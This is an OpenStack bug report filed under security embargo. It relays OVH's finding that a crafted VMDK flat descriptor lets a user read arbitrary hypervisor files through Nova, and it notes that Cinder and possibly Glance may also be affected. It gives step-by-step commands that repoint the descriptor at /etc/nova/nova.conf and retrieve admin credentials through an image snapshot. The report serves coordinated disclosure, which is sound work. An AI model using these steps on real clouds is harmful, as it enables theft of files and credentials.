Comment 0 for bug 1996188

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Jeremy Stanley (fungi) wrote : Arbitrary file access through custom VMDK flat descriptor

This issue is being treated as a potential security risk under
embargo. Please do not make any public mention of embargoed
(private) security vulnerabilities before their coordinated
publication by the OpenStack Vulnerability Management Team in the
form of an official OpenStack Security Advisory. This includes
discussion of the bug or associated fixes in public forums such as
mailing lists, code review systems and bug trackers. Please also
avoid private disclosure to other individuals not already approved
for access to this information, and provide this same reminder to
those who are made aware of the issue prior to publication. All
discussion should remain confined to this private bug report, and
any proposed fixes should be added to the bug as attachments. This
embargo shall not extend past 2023-02-08 and will be made
public by or on that date even if no fix is identified.

The vulnerability managers received the following report from Sébastien Meriot with OVH via encrypted E-mail:

Our Openstack team did discover what looks like a security issue in Nova this morning allowing a remote attacker to read any file on the system.
After making a quick CVSS calculation, we got a CVSS of 5.8 (CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:N/A:N).

Here is the details :
By using a VMDK file, you can dump any file on the hypervisor.
1. Create an image: qemu-img create -f vmdk leak.vmdk 1M -o subformat=monolithicFlat
2. Edit the leak.vmdk and change the name this way: RW 2048 FLAT "leak-flat.vmdk" 0 --> RW 2048 FLAT "/etc/nova/nova.conf" 0
3. Upload the image: openstack image create --file leak.vmdk leak.vmdk
4. Start a new instance: openstack server create --image leak.vmdk --net demo --flavor nano leak-instance
5. The instance won't boot of course. You can create an image from this instance: openstack server image create --name leak-instance-image leak-instance
6. Download the image: openstack image save --file leak-instance-image leak-instance-image
7. You get access to the nova.conf file content and you can get access to the openstack admin creds.

We are working on a fix and would be happy to share it with you if needed.
We think it does affect Nova but it could affect Glance as well. We're not sure yet.

[postscript per Arnaud Morin (amorin) in IRC]

cinder seems also affected